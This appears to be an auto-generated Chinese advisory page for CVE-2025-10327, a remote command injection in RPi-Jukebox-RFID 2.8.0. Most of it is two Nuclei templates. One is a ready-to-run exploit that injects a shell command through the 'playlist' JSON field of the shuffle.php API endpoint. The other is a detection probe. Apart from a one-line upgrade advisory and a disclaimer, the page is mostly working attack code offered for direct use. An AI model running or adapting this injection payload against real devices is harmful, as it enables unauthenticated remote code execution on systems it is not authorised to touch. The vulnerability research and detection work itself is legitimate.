漏洞分析

[webapps] RPi-Jukebox-RFID 2.8.0 - Remote Command Execution

AiRedTeam

06 May 2026 • 阅读时间 2 分钟

CVE-2025-10327

漏洞

High · CVSS N/A

📋 漏洞基础信息

CVE	CVE-2025-10327
漏洞类型	`漏洞`
受影响版本	详见原文
危害等级	High · CVSS N/A
发布日期	2026-01-17
提交者	Beatriz Fresno Naumova
来源	Exploit-DB 原文 ↗

⚔️ Nuclei Exploit 模板

以下为标准 Nuclei v3 格式的利用模板，可直接用于漏洞验证：

id: CVE-2025-10327-exploit

info:
  name: RPi-Jukebox-RFID 2.8.0 - Remote Code Execution
  author: Beatriz Fresno Naumova
  severity: critical
  description: RPi-Jukebox-RFID shuffle.php endpoint is vulnerable to command injection in the playlist parameter
  reference:
    - https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-10327

variables:
  cmd: "id"

http:
  - raw:
      - |
        PUT {{BaseURL}}/phoniebox/api/playlist/shuffle.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0

        {"playlist":"test';{{cmd}};echo '","shuffle":"true"}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - 'uid=\d+\([a-zA-Z0-9_]+\)'
          - 'gid=\d+\([a-zA-Z0-9_]+\)'
          - 'No playlist specified'
          - 'Playlist parameter missing'
        condition: or
        part: body

      - type: status
        status:
          - 200
          - 400
          - 500

🔍 Nuclei Detection 模板

以下为漏洞探测模板，用于判断目标是否受影响：

id: CVE-2025-10327-detection

info:
  name: RPi-Jukebox-RFID 2.8.0 - Detection
  author: Beatriz Fresno Naumova
  severity: info
  description: RPi-Jukebox-RFID version detection via API endpoint
  reference:
    - https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-10327

http:
  - method: GET
    path:
      - '{{BaseURL}}/phoniebox/api/playlist/shuffle.php'
      - '{{BaseURL}}/api/playlist/shuffle.php'

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        words:
          - "No playlist specified"
          - "Playlist parameter missing"
        part: body

      - type: status
        status:
          - 200
          - 400
          - 500

🛡️ 修复建议

请升级到厂商最新安全版本。

📎 参考链接

Exploit-DB 原文

⚠️ 本文基于公开漏洞数据库，仅供安全研究与防御参考。生成时间: 2026-05-07 06:15 | 来源: Exploit-DB